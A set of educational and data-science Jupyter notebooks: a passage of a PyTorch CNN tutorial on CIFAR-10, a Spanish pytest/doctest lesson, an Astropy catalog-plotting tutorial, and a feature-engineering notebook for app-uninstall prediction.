<img src='https://miro.medium.com/max/684/1*PBnmjdDqn-OF8JEyRgKm9Q.png' width='200' align="center">
<font color='red'> Important </font>: The goal of a convolutional neural network is to learn the values of filters. They are treated as parameters, which the network learns using backpropagation.
## 1-3) Output image
The size of the output image after applying the filter, knowing the filter size (f), stride (s), pad (p), and input size (n) is given as:
<img src='https://miro.medium.com/max/933/1*rOyHQ2teFXX5rIIFHwYDsg.png' width='400' align="center">
<img src='https://miro.medium.com/max/933/1*IBWQJSnW19WIYsObZcMTNg.png' width='500' align="center">
## 1-4) Multiple filters
We can generalize the application of one filter at a time to multiple filters to detect several different features. This is the concept for building convolutional neural networks. Each filter brings its own output and we stack them all together and create an output volume, such as:
<img src='https://miro.medium.com/max/933/1*ySaRmKSilLahyK2WxXC1bA.png' width='500' align="center">
The general formula of the output image can be written as:
<img src='https://miro.medium.com/max/933/1*pN09gs3rXeTh_EwED1d76Q.png' width='500' align="center">
where nc is the number of filters
## 1-5) One-layer of a convolutional neural network
The final step that takes us to a convolutional neural layer is to add the bias and a non-linear function.
The goal of the activation function is to add a non-linearity to the network so that it can model non-linear relationships. The most used is Rectified Linear (RELU) defined as max(0,z) with thresholding at zero. This function assigns zeros to all negatives inputs and keep the same values to the positives inputs. This leaves the size of the output volume unchanged ([4x4x1]).
<img src='https://miro.medium.com/max/933/1*LiBZo_FcnKWqoU7M3GRKbA.png' width='300' align="center">
<img src='https://miro.medium.com/max/933/1*EpeM8rTf5RFKYphZwYItkg.png' width='500' align="center">
The parameters involved in one layer are the elements forming the filters and the bias.
Example: if we have 10 filters that are of size 3x3x3 in one layer of a neural network. Each filter has 27 (3x3x3) + 1 bias => 28 parameters. Therefore, the total amount of parameters in the layer is 280 (10x28).
## Deep Convolutional Network
<img src='https://miro.medium.com/max/933/1*PT1sP_kCvdFEiJEsoKU88Q.png' width='600' align="center">
# 2) Pooling layer
Pooling layer performs a downsampling operation by progressively reducing the spatial size of the representation (input volume) to reduce the amount of learnable parameters and thus the computational cost; and to avoid overfitting by providing an abstracted form of the input. The Pooling Layer operates independently on every depth slice of the input and resizes it.
There are two types of pooling layers: max and average pooling.
* Max pooling: a filter which takes take the largest element within the region it covers.
* Average pooling: a filter which retains the average of the values encountered within the region it covers.
Note: pooling layer does not have any parameters to learn.
<img src='https://miro.medium.com/max/933/1*voEBfjohEDVRK7RpNvxd-Q.png' width='300' align="center">
# 3) Fully connected layer
Fully connected layer (FC) is a layer where all the layer inputs are connectd to all layer outputs. In classification task, FC is used to extract features from the data to make the classification work. Also, FC computes the class scores to classifier the data. In general, FC layer is added to make the model end-to-end trainable by learning a function between the high-level features given as an output from the convolutional layers.
<img src='https://miro.medium.com/max/933/1*_l-0PeSh3oL2Wc2ri2sVWA.png' width='600' align="center">
It’s common that, as we go deeper into the network, the sizes (nh, nw) decrease, while the number of channels (nc) increases.
# 4) Softmax
The softmax function is a type of a sigmoid function, not a loss, used in classification problems. The softmax function is ideally used in the output layer of the classifier where we are actually trying to get the probabilities to define the class of each input.
The Softmax function cannot be applied independently to each $s_i$, since it depends on all elements of $s$. For a given class $s_i$, the Softmax function can be computed as:
$$ f(s)_{i} = \frac{e^{s_{i}}}{\sum_{j}^{C} e^{s_{j}}} $$
Where $s_j$ are the scores inferred by the net for each class in C. Note that the Softmax activation for a class $s_i$ depends on all the scores in $s$.
So, if a network with 3 neurons in the output layer outputs [1.6, 0.55, 0.98], then with a softmax activation function, the outputs get converted to [0.51, 0.18, 0.31]. This way, it is easier for us to classify a given data point and determine to which category it belongs.
<img src='https://gombru.github.io/assets/cross_entropy_loss/intro.png' width='400' align="center">
# 5) Application of CNN using CIFAR dataset
## 5-1) dataset
For the CNN application, we will use the CIFAR10 dataset. It has the classes: ‘airplane’, ‘automobile’, ‘bird’, ‘cat’, ‘deer’, ‘dog’, ‘frog’, ‘horse’, ‘ship’, ‘truck’. The images in CIFAR-10 are of size 3x32x32, i.e. 3-channel color images of 32x32 pixels in size.
<img src='https://cs231n.github.io/assets/cnn/convnet.jpeg' width='600' align="center">
## 5-2) Load and normalize the CIFAR10 training and test datasets using torchvision
```
import torch
import torchvision # torchvision is for loading the dataset (CIFAR10)
import torchvision.transforms as transforms # torchvision.transforms is for data transformers for images
import numpy as np
# Hyper-parameters
num_epochs = 5
batch_size = 4
learning_rate = 0.001
# dataset has PILImage images of range [0, 1].
# We transform them to Tensors of normalized range [-1, 1]
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
# A CIFAR10 dataset are available in pytorch. We load CIFAR from torchvision.datasets
# CIFAR10: 60000 32x32 color images in 10 classes, with 6000 images per class
train_dataset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform)
test_dataset = torchvision.datasets.CIFAR10(root='./data', train=False,
download=True, transform=transform)
# We define the pytorch data loader so that we can do the batch optimazation and batch training
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,
shuffle=False)
# Define the classes
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
```
## 5-3) Define a Convolutional Neural Network
```
import torch.nn as nn # for the the neural network
import torch.nn.functional as F # import activation function (relu; softmax)
# Implement the ConvNet
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5) # create the first conv layer-- 3: num of channel; 6: output layer; 5: kernel size
self.pool = nn.MaxPool2d(2, 2) # create the first pool layer -- 2: kernel size; 2: stride size
self.conv2 = nn.Conv2d(6, 16, 5) # create the second conv layer -- 6: the input channel size must be equal to the last output channel size; 16: the output; 5: kernel size
self.fc1 = nn.Linear(16 * 5 * 5, 120) # # create the FC layer (classification layer) to flattern 3-d tensor to 1-d tensor
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# -> size of x: [3, 32, 32]
x = self.pool(F.relu(self.conv1(x))) # -> size of x: [6, 14, 14] # call an activation function (relu)
x = self.pool(F.relu(self.conv2(x))) # -> size of x: [16, 5, 5]
x = x.view(-1, 16 * 5 * 5) # -> size of x: [400]
x = F.relu(self.fc1(x)) # -> size of x: [120]
x = F.relu(self.fc2(x)) # -> size of x: [84]
x = self.fc3(x) # -> size of x: [10]
return x
# Create the model
model = ConvNet()
```
<img src='https://miro.medium.com/max/933/1*rOyHQ2teFXX5rIIFHwYDsg.png' width='400' align="center">
## 5-4) Define a Loss function and optimizer
```
# Create the loss function (multiclass-classification problem)--> CrossEntropy
criterion = nn.CrossEntropyLoss() # the softmax is included in the loss
# Create the optimizer (use the stochastic gradient descent to optimize the model parameters given the lr)
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)
```
### Stochastic gradient descent (SGD)
Unlike the gradiend descent that takes the sum of squared residuals of all data points for each iteration of the algorithm, which is computaionally costed, SGD randomly picks one data point from the whole data set at each iteration to reduce the computations enormously.
## 5-5) Train the CNN
```
# training loop
n_total_steps = len(train_loader)
for epoch in range(num_epochs):# loop over the number of epochs (5)
for i, (images, labels) in enumerate(train_loader):
# origin shape: [4, 3, 32, 32] = 4, 3, 1024
# input_layer: 3 input channels, 6 output channels, 5 kernel size
images = images # get the inputs images
labels = labels # get the inputs labels
# Forward pass
outputs = model(images) # forward: calculate the loss between the predicted scores and the ground truth
loss = criterion(outputs, labels) # compute the CrossEntropy loss between the predicted and the real labels
# Backward and optimize
optimizer.zero_grad() # zero the parameter gradients
loss.backward() # the backward propagates the error (loss) back into the network and update each weight and bias for each layer in the CNN using SGD optimizer
optimizer.step() # compute the SGD to find the next
if (i+1) % 2000 == 0: # print every 2000 mini-batches
print (f'Epoch [{epoch+1}/{num_epochs}], Step [{i+1}/{n_total_steps}], Loss: {loss.item():.4f}')
print('Finished Training')
```
## 5-6) Test the network on the test data
```
# Evaluating the model
with torch.no_grad(): # since we're not training, we don't need to calculate the gradients for our outputs
n_correct = 0
n_samples = 0
n_class_correct = [0 for i in range(10)]
n_class_samples = [0 for i in range(10)]
for images, labels in test_loader:
outputs = model(images) # run images through the network and output the probability distribution that image belongs to each class over 10 classes
# max returns (value ,index)
_, predicted = torch.max(outputs, 1) # returns the index having the highest probability score of each image over one batch
n_samples += labels.size(0)
n_correct += (predicted == labels).sum().item() # returns the number of corrected classified samples in each batch and increment them to the total right classified samples
for i in range(batch_size):
label = labels[i]
pred = predicted[i]
if (label == pred): # test if the predicted label of a sample is equal to the real label
n_class_correct[label] += 1 # calculate the number of corrected classified samples in each class
n_class_samples[label] += 1 # calculate the number of samples in each class (test data)
acc = 100.0 * n_correct / n_samples # calculate the accuracy classification of the network
outputs
```
* We will visualize the outputs which represent the classes probability scores of 4 samples in one batch.
* Each sample has 10 classes probability scores. The index of the class having the highest score will be the predicted value and which will be compared with the ground truth later on.
```
import pandas as pd # Visualizing Statistical Data
import seaborn as sns # Visualizing Statistical Data
df = pd.DataFrame({'accuracy_sample 1': outputs[0, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 1', data = df, palette ='plasma')
df = pd.DataFrame({'accuracy_sample 2': outputs[1, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 2', data = df, palette ='plasma')
df = pd.DataFrame({'accuracy_sample 3': outputs[2, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 3', data = df, palette ='plasma')
df = pd.DataFrame({'accuracy_sample 4': outputs[3, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 4', data = df, palette ='plasma')
predicted
labels
n_samples
n_correct
acc = 100.0 * n_correct / n_samples # calculate the accuracy classification of the network
print('The accuracy classification of the network is:', acc)
list_class = []
for i in range(10): # calculate the accuracy classification for each class
acc = 100.0 * n_class_correct[i] / n_class_samples[i]
list_class.append(acc)
print(f'Accuracy of {classes[i]}: {acc} %')
list_class
df = pd.DataFrame({'accuracy': [42.6, 49.9, 25.7, 40.9, 34.8, 26.7, 57.6, 62.6, 68.2, 66.4], 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy', data = df, palette ='plasma')
```
The classes that performed well are: car, ship, frog, plane and horse (choose a threshold rate equal to 0.5).
For the classes that did not perform well are: bird, cat, deer, dog and truck.
Thanks!
|
github_jupyter
|

```
# import requests
# with open("mynote.ipynb", "w") as f:
# f.write(requests.get("https://raw.githubusercontent.com/polyrand/teach/master/05_testing/testing.ipynb").text)
# !pip install ipytest
import warnings
warnings.filterwarnings("ignore")
import pytest
import ipytest
ipytest.config(rewrite_asserts=True, magics=True)
__file__ = "testing.ipynb"
assert [1, 2, 3] == [1, 2, 3]
num = 1.25
assert isinstance(num, int), f"La variable num debe ser un entero pero es: {num}"
def test_example():
assert [1, 2, 3] == [1, 2, 3]
def capital_case(x):
return x.capitalize()
capital_case("un texto")
%%run_pytest[clean]
def test_capital_case():
assert capital_case("semaphore") == "Semaphore"
assert capital_case("python") == "Python"
assert capital_case("curso") == "Curso"
%%run_pytest[clean] -qq
import pytest
@pytest.fixture
def supply_AA_BB_CC():
aa = 25
bb = 35
cc = 45
return [aa, bb, cc]
def test_comparewithAA(supply_AA_BB_CC):
zz = 25
assert supply_AA_BB_CC[0] == zz, "aa and zz comparison failed"
def test_comparewithBB(supply_AA_BB_CC):
zz = 35
assert supply_AA_BB_CC[1] == zz, "bb and zz comparison failed"
def test_comparewithCC(supply_AA_BB_CC):
zz = 25
assert supply_AA_BB_CC[2] == zz, "cc and zz comparison failed"
```
## Ejercicio
Crear test para las dos siguientes funciones.
```
def maximo(valores):
"""Calcula el valor maximo de un iterable.
Si se encuentra un `str` hará aosdnad
>>> ...
...
"""
max_valor = valores[0]
for val in valores:
if val > max_valor:
max_valor = val
return max_valor
def minimo(valores):
min_valor = valores[0]
for val in valores:
if val < min_valor:
min_valor = val
return min_valor
def maximo(valores):
"""Calcular el valor máximo de un iterable.
>>> maximo([1,2,3,4,5,])
5
>>> maximo([123123,-2,-234234,0])
123123
"""
return max(valores)
def minimo(valores):
return min(valores)
import doctest
doctest.testmod(verbose=True)
%%run_pytest[clean] -qq
def test_minimo():
valores = (2, 3, 1, 4, 6)
val = minimo(valores)
assert val == 1
assert minimo([8,0,4]) == 0
def test_maximo():
valores = (2, 3, 1, 4, 6)
val = maximo(valores)
assert val == 6
%%run_pytest[clean] -m cursopython
@pytest.mark.cursopython
def test_b1():
assert "falcon" == "fal" + "con"
@pytest.mark.cursopython2
def test_b12():
assert "falcon" == "fal" + "con"
%%run_pytest[clean]
@pytest.mark.parametrize(
"valores,resultado",
[
([30, 20, 10], 10),
([200000, -1, 12], -1),
([30, 20, 10], "asd"),
([30, 20, 10], 10),
],
)
def test_parser_xml(valores, resultado):
min_valor = valores[0]
for val in valores:
if val < min_valor:
min_valor = val
assert min_valor == resultado
```
## Unit Tests
```
import unittest
class TestDemo(unittest.TestCase):
"""Example of how to use unittest in Jupyter."""
def test(self):
self.assertEqual("foo".upper(), "FOO")
if __name__ == "__main__":
unittest.main(argv=["first-arg-is-ignored"], exit=False)
```
## Doctests
```
def add(a, b):
"""
Suma dos elementos.
>>> add(2, 2)
4
>>> add(10, 2)
12
>>> add(125, 3)
128
"""
return a + b
import doctest
doctest.testmod(verbose=True)
datos_servers = {
"server_1": [1,2,3],
"server_2": [2,3,4],
"server_3": [4,5,6],
"año": 2020,
"admin": "ricardo",
}
## ejercicio escribir doctest para esta función
def filtrar_diccionario(dd):
"""
Devuelve las llaves de un diccionario que empiezan por 'server_'.
Si la palabra 'server_' está en mitad de la key, no la captura,
solamente si está al principio.
>>> datos_servers = {
... "server_1": [1,2,3],
... "server_2": [2,3,4],
... "server_3": [4,5,6],
... "año": 2020,
... "admin": "ricardo",
... }
>>> datos_servers_2 = {
... "hola_server_1": [1,2,3],
... "server_2": [2,3,4],
... "server_3": [4,5,6],
... "año": 2020,
... "admin": "ricardo",
... }
>>> filtrar_diccionario(datos_servers)
['server_1', 'server_2', 'server_3']
>>> filtrar_diccionario(datos_servers_2)
['server_2', 'server_3']
>>> filtrar_diccionario({})
[]
"""
keys = []
for llave in dd.keys():
if llave.startswith("server_"):
keys.append(llave)
return keys
filtrar_diccionario(datos_servers)
import doctest
doctest.testmod(verbose=True)
help(doctest)
import doctest
doctest.testmod(verbose=True)
```
## Ejercicio
Escribir doctests para las funciontes anteriores!!!
```
Directory structure that makes running tests easy
Fuente: https://medium.com/@bfortuner/python-unit-testing-with-pytest-and-mock-197499c4623c
/rootdir
/src
/jobitems
api.py
constants.py
manager.py
models.py
tasks.py
/tests
/integ_tests
/jobitems
test_manager.py
/unit_tests
/jobitems
test_manager.py
requirements.py
application.py
How do I run these tests?
python -m pytest tests/ (all tests)
python -m pytest -k filenamekeyword (tests matching keyword)
python -m pytest tests/utils/test_sample.py (single test file)
python -m pytest tests/utils/test_sample.py::test_answer_correct (single test method)
python -m pytest --resultlog=testlog.log tests/ (log output to file)
python -m pytest -s tests/ (print output to console)
````
## Pytest Monekypatching
```
# contents of test_module.py with source code and the test
from pathlib import Path
def getssh():
"""Simple function to return expanded homedir ssh path."""
return Path.home() / ".ssh"
def test_getssh(monkeypatch):
# mocked return function to replace Path.home
# always return '/abc'
def mockreturn():
return Path("/abc")
# Application of the monkeypatch to replace Path.home
# with the behavior of mockreturn defined above.
monkeypatch.setattr(Path, "home", mockreturn)
# Calling getssh() will use mockreturn in place of Path.home
# for this test with the monkeypatch.
x = getssh()
assert x == Path("/abc/.ssh")
class C:
def hola(self):
print("Hola")
c = C()
c.hola()
setattr(C, "adios", lambda x: print("adios"))
f = C()
f.adios()
```
|
github_jupyter
|
# Read in catalog information from a text file and plot some parameters
## Authors
Adrian Price-Whelan, Kelle Cruz, Stephanie T. Douglas
## Learning Goals
* Read an ASCII file using `astropy.io`
* Convert between representations of coordinate components using `astropy.coordinates` (hours to degrees)
* Make a spherical projection sky plot using `matplotlib`
## Keywords
file input/output, coordinates, tables, units, scatter plots, matplotlib
## Summary
This tutorial demonstrates the use of `astropy.io.ascii` for reading ASCII data, `astropy.coordinates` and `astropy.units` for converting RA (as a sexagesimal angle) to decimal degrees, and `matplotlib` for making a color-magnitude diagram and on-sky locations in a Mollweide projection.
```
import numpy as np
# Set up matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
```
Astropy provides functionality for reading in and manipulating tabular
data through the `astropy.table` subpackage. An additional set of
tools for reading and writing ASCII data are provided with the
`astropy.io.ascii` subpackage, but fundamentally use the classes and
methods implemented in `astropy.table`.
We'll start by importing the `ascii` subpackage:
```
from astropy.io import ascii
```
For many cases, it is sufficient to use the `ascii.read('filename')`
function as a black box for reading data from table-formatted text
files. By default, this function will try to figure out how your
data is formatted/delimited (by default, `guess=True`). For example,
if your data are:
# name,ra,dec
BLG100,17:51:00.0,-29:59:48
BLG101,17:53:40.2,-29:49:52
BLG102,17:56:20.2,-29:30:51
BLG103,17:56:20.2,-30:06:22
...
(see _simple_table.csv_)
`ascii.read()` will return a `Table` object:
```
tbl = ascii.read("simple_table.csv")
tbl
```
The header names are automatically parsed from the top of the file,
and the delimiter is inferred from the rest of the file -- awesome!
We can access the columns directly from their names as 'keys' of the
table object:
```
tbl["ra"]
```
If we want to then convert the first RA (as a sexagesimal angle) to
decimal degrees, for example, we can pluck out the first (0th) item in
the column and use the `coordinates` subpackage to parse the string:
```
import astropy.coordinates as coord
import astropy.units as u
first_row = tbl[0] # get the first (0th) row
ra = coord.Angle(first_row["ra"], unit=u.hour) # create an Angle object
ra.degree # convert to degrees
```
Now let's look at a case where this breaks, and we have to specify some
more options to the `read()` function. Our data may look a bit messier::
,,,,2MASS Photometry,,,,,,WISE Photometry,,,,,,,,Spectra,,,,Astrometry,,,,,,,,,,,
Name,Designation,RA,Dec,Jmag,J_unc,Hmag,H_unc,Kmag,K_unc,W1,W1_unc,W2,W2_unc,W3,W3_unc,W4,W4_unc,Spectral Type,Spectra (FITS),Opt Spec Refs,NIR Spec Refs,pm_ra (mas),pm_ra_unc,pm_dec (mas),pm_dec_unc,pi (mas),pi_unc,radial velocity (km/s),rv_unc,Astrometry Refs,Discovery Refs,Group/Age,Note
,00 04 02.84 -64 10 35.6,1.01201,-64.18,15.79,0.07,14.83,0.07,14.01,0.05,13.37,0.03,12.94,0.03,12.18,0.24,9.16,null,L1γ,,Kirkpatrick et al. 2010,,,,,,,,,,,Kirkpatrick et al. 2010,,
PC 0025+04,00 27 41.97 +05 03 41.7,6.92489,5.06,16.19,0.09,15.29,0.10,14.96,0.12,14.62,0.04,14.14,0.05,12.24,null,8.89,null,M9.5β,,Mould et al. 1994,,0.0105,0.0004,-0.0008,0.0003,,,,,Faherty et al. 2009,Schneider et al. 1991,,,00 32 55.84 -44 05 05.8,8.23267,-44.08,14.78,0.04,13.86,0.03,13.27,0.04,12.82,0.03,12.49,0.03,11.73,0.19,9.29,null,L0γ,,Cruz et al. 2009,,0.1178,0.0043,-0.0916,0.0043,38.4,4.8,,,Faherty et al. 2012,Reid et al. 2008,,
...
(see _Young-Objects-Compilation.csv_)
If we try to just use `ascii.read()` on this data, it fails to parse the names out and the column names become `col` followed by the number of the column:
```
tbl = ascii.read("Young-Objects-Compilation.csv")
tbl.colnames
```
What happened? The column names are just `col1`, `col2`, etc., the
default names if `ascii.read()` is unable to parse out column
names. We know it failed to read the column names, but also notice
that the first row of data are strings -- something else went wrong!
```
tbl[0]
```
A few things are causing problems here. First, there are two header
lines in the file and the header lines are not denoted by comment
characters. The first line is actually some meta data that we don't
care about, so we want to skip it. We can get around this problem by
specifying the `header_start` keyword to the `ascii.read()` function.
This keyword argument specifies the index of the row in the text file
to read the column names from:
```
tbl = ascii.read("Young-Objects-Compilation.csv", header_start=1)
tbl.colnames
```
Great! Now the columns have the correct names, but there is still a
problem: all of the columns have string data types, and the column
names are still included as a row in the table. This is because by
default the data are assumed to start on the second row (index=1).
We can specify `data_start=2` to tell the reader that the data in
this file actually start on the 3rd (index=2) row:
```
tbl = ascii.read("Young-Objects-Compilation.csv", header_start=1, data_start=2)
```
Some of the columns have missing data, for example, some of the `RA` values are missing (denoted by -- when printed):
```
print(tbl['RA'])
```
This is called a __Masked column__ because some missing values are
masked out upon display. If we want to use this numeric data, we have
to tell `astropy` what to fill the missing values with. We can do this
with the `.filled()` method. For example, to fill all of the missing
values with `NaN`'s:
```
tbl['RA'].filled(np.nan)
```
Let's recap what we've done so far, then make some plots with the
data. Our data file has an extra line above the column names, so we
use the `header_start` keyword to tell it to start from line 1 instead
of line 0 (remember Python is 0-indexed!). We then used had to specify
that the data starts on line 2 using the `data_start`
keyword. Finally, we note some columns have missing values.
```
data = ascii.read("Young-Objects-Compilation.csv", header_start=1, data_start=2)
```
Now that we have our data loaded, let's plot a color-magnitude diagram.
Here we simply make a scatter plot of the J-K color on the x-axis
against the J magnitude on the y-axis. We use a trick to flip the
y-axis `plt.ylim(reversed(plt.ylim()))`. Called with no arguments,
`plt.ylim()` will return a tuple with the axis bounds,
e.g. (0,10). Calling the function _with_ arguments will set the limits
of the axis, so we simply set the limits to be the reverse of whatever they
were before. Using this `pylab`-style plotting is convenient for
making quick plots and interactive use, but is not great if you need
more control over your figures.
```
plt.scatter(data["Jmag"] - data["Kmag"], data["Jmag"]) # plot J-K vs. J
plt.ylim(reversed(plt.ylim())) # flip the y-axis
plt.xlabel("$J-K_s$", fontsize=20)
plt.ylabel("$J$", fontsize=20)
```
As a final example, we will plot the angular positions from the
catalog on a 2D projection of the sky. Instead of using `pylab`-style
plotting, we'll take a more object-oriented approach. We'll start by
creating a `Figure` object and adding a single subplot to the
figure. We can specify a projection with the `projection` keyword; in
this example we will use a Mollweide projection. Unfortunately, it is
highly non-trivial to make the matplotlib projection defined this way
follow the celestial convention of longitude/RA increasing to the left.
The axis object, `ax`, knows to expect angular coordinate
values. An important fact is that it expects the values to be in
_radians_, and it expects the azimuthal angle values to be between
(-180º,180º). This is (currently) not customizable, so we have to
coerce our RA data to conform to these rules! `astropy` provides a
coordinate class for handling angular values, `astropy.coordinates.Angle`.
We can convert our column of RA values to radians, and wrap the
angle bounds using this class.
```
ra = coord.Angle(data['RA'].filled(np.nan)*u.degree)
ra = ra.wrap_at(180*u.degree)
dec = coord.Angle(data['Dec'].filled(np.nan)*u.degree)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111, projection="mollweide")
ax.scatter(ra.radian, dec.radian)
```
By default, matplotlib will add degree tick labels, so let's change the
horizontal (x) tick labels to be in units of hours, and display a grid:
```
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111, projection="mollweide")
ax.scatter(ra.radian, dec.radian)
ax.set_xticklabels(['14h','16h','18h','20h','22h','0h','2h','4h','6h','8h','10h'])
ax.grid(True)
```
We can save this figure as a PDF using the `savefig` function:
```
fig.savefig("map.pdf")
```
## Exercises
Make the map figures as just above, but color the points by the `'Kmag'` column of the table.
Try making the maps again, but with each of the following projections: `aitoff`, `hammer`, `lambert`, and `None` (which is the same as not giving any projection). Do any of them make the data seem easier to understand?
|
github_jupyter
|
#Feature Engineering Notebook
Data given was in raw format and it needed to be converted into format which model could make sense. We considered data of 150K users while modelling. <br>
A data frame **final_df** was created with all the features.<br>
A dataframe **uninstall_unique** was created which had data of the users and the latest uninstalled date.
##Mount Google drive in Colab where data is stored
```
from google.colab import drive
drive.mount('/content/drive')
import os
#os.chdir('drive/My Drive/Capstone/CleverTap Capstone/Data")
```
## Import necessary python libraries<br>
As the data was large we tried to use modin for faster computation but we found it was slower than pandas.
```
#!pip install modin
#!pip install --upgrade pandas
#!pip install ray
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings('ignore')
from tqdm import tqdm
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
```
##Function: inttostr()
All the six csv data files had date column and the dates were in integer format.This function converted and formatted the dates.
```
def inttostr(x):
x = str(x)
return x[:4]+'-'+x[4:6]+'-'+x[6:]
```
### Cell description
Below cell stores the number of times a user launched the app and the number of days between first launch and latest launch. Number of days were used to create additional feature **launch_rate**
```
launch = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/AppLaunched.csv')
launch['Date'] = pd.to_datetime(launch['Date'].apply(lambda x:inttostr(x)))
userids = launch.UserId.unique()[0:150000]
launch_days_list=[]
install_list=[]
for uid in tqdm(userids):
temp = launch.loc[launch.UserId==uid]
launch_days_list.append((temp.Date.max()-temp.Date.min()).days)
install_list.append(temp.shape[0])
```
### Cell Description
Below cell stores the latest status of user in the form completed, not completed or unknown.
```
registration = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/Registration.csv')
registration.Status=registration.Status.replace({'Complete':'Completed'})
status_list=[]
country_list = []
for uid in tqdm(userids):
temp = registration.loc[registration.UserId==uid]
status = temp.Status.tolist()[-1] if len(temp.Status.tolist())>0 else 'Unknown'
status_list.append(status)
if temp.shape[0]>0:
country_list.append(temp.Country.value_counts().values[0])
else:
country_list.append(0)
#final_df = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/final_df.csv',index_col=0)
def top_country(x):
if x>2:
return 5
else:return x
temp = pd.Series(country_list).apply(lambda x:top_country(x))
temp = temp.replace({0:'A',1:'B',2:'C',5:'MISC'})
country_list = temp.tolist()
temp.value_counts()
final_df = pd.get_dummies(final_df)
final_df.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/final_df.csv')
```
### Cell Description
Below cell stores the number of times a user clicked UTM.
```
utmvisited = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/UTMVisited.csv')
utm_list = []
for uid in tqdm(userids):
temp = utmvisited.loc[utmvisited.UserId==uid]
utm_list.append(temp.shape[0])
#utm_list = pd.Series(utm_list)
#utm_list.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/utm_visted.csv')
```
### Cell Description
Below cell stores number of videos a user watched genre wise, category wise and program_type_dict wise. <br>
It also stores number of days user was active and number of videos he watched repetitively. <br>
Number of days is used later to calculate number of videos a user watched per day.
```
vidstarted = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/VideoStarted.csv')
vidstarted['Date'] = pd.to_datetime(vidstarted['Date'].apply(lambda x:inttostr(x)))
genre_dict = {genre:np.zeros(len(userids)) for genre in vidstarted.Genre.unique()}
category_dict = {cat:np.zeros(len(userids)) for cat in vidstarted.Category.unique()}
program_type_dict = {ptype:np.zeros(len(userids)) for ptype in vidstarted.ProgramType.unique()}
vidstart_days_list=[]
watches_rep_vid_list = []
for idx,uid in enumerate(tqdm(userids)):
temp = vidstarted.loc[vidstarted.UserId==uid]
for genre in temp.Genre.tolist():genre_dict[genre][idx]+=1;
for cat in temp.Category.tolist():category_dict[cat][idx]+=1;
for ptype in temp.ProgramType.tolist():program_type_dict[ptype][idx]+=1;
vidstart_days_list.append((temp.Date.max()-temp.Date.min()).days)
if len(temp.VideoId.value_counts().values)>2:
rvf = temp.VideoId.value_counts().values[0] + temp.VideoId.value_counts().values[1] #if temp.VideoId.value_counts().values[0]>1
elif len(temp.VideoId.value_counts().values)==1:
rvf = temp.VideoId.value_counts().values[0]
else: rvf=0
watches_rep_vid_list.append(rvf)
temp = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/VideoStarted.csv')
temp = temp[temp.UserId.isin(userids)]
temp.shape
```
###Cell Description
Below cell merges three dictionaries genre, category and program type into single dictionary. Keys of these dictionaries will be used as features in final dataframe.
```
movie_det_dict = {**genre_dict, **category_dict, **program_type_dict}
```
### Cell Description
Below cell stores the number of times a user has watched video details.
```
viddetails = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/VideoDetails.csv')
viddetails['Date'] = pd.to_datetime(viddetails['Date'].apply(lambda x:inttostr(x)))
temp = viddetails.loc[viddetails.UserId.isin(userids)]
cnt_series = temp.UserId.value_counts()
viewed_vid_cnt = [cnt_series.loc[uid] if uid in cnt_series.index else 0 for uid in tqdm(userids) ]
#viddet_days_list = [(viddetails.loc[viddetails.UserId.isin(list(uid))]['Date'].max()-viddetails.loc[viddetails.UserId.isin(list(uid))]['Date'].max()).days for uid in tqdm(userids)]
```
### Cell Description
Below cell creates empty data frame **final_df** and stores all the features generated till now in the dataframe.
```
final_df = pd.DataFrame(data=movie_det_dict)
final_df['launched_days'] = pd.Series(launch_days_list)
final_df['installed_times'] = pd.Series(install_list)
final_df['reg_status'] = pd.Series(status_list)
final_df['utm_visited_times'] = pd.Series(utm_list)
final_df['watched_days'] = pd.Series(vidstart_days_list)
final_df['vid_rep_count'] = pd.Series(watches_rep_vid_list)
final_df['viddet_view_cnt'] = pd.Series(viewed_vid_cnt)
final_df['country'] = pd.Series(country_list)
final_df.index = userids
final_df.head()
```
### Cell Description
Below cell creates dummy variables for all the categorical features.
```
final_df = pd.get_dummies(final_df);
final_df.shape
```
### Save the dataframe in csv file
```
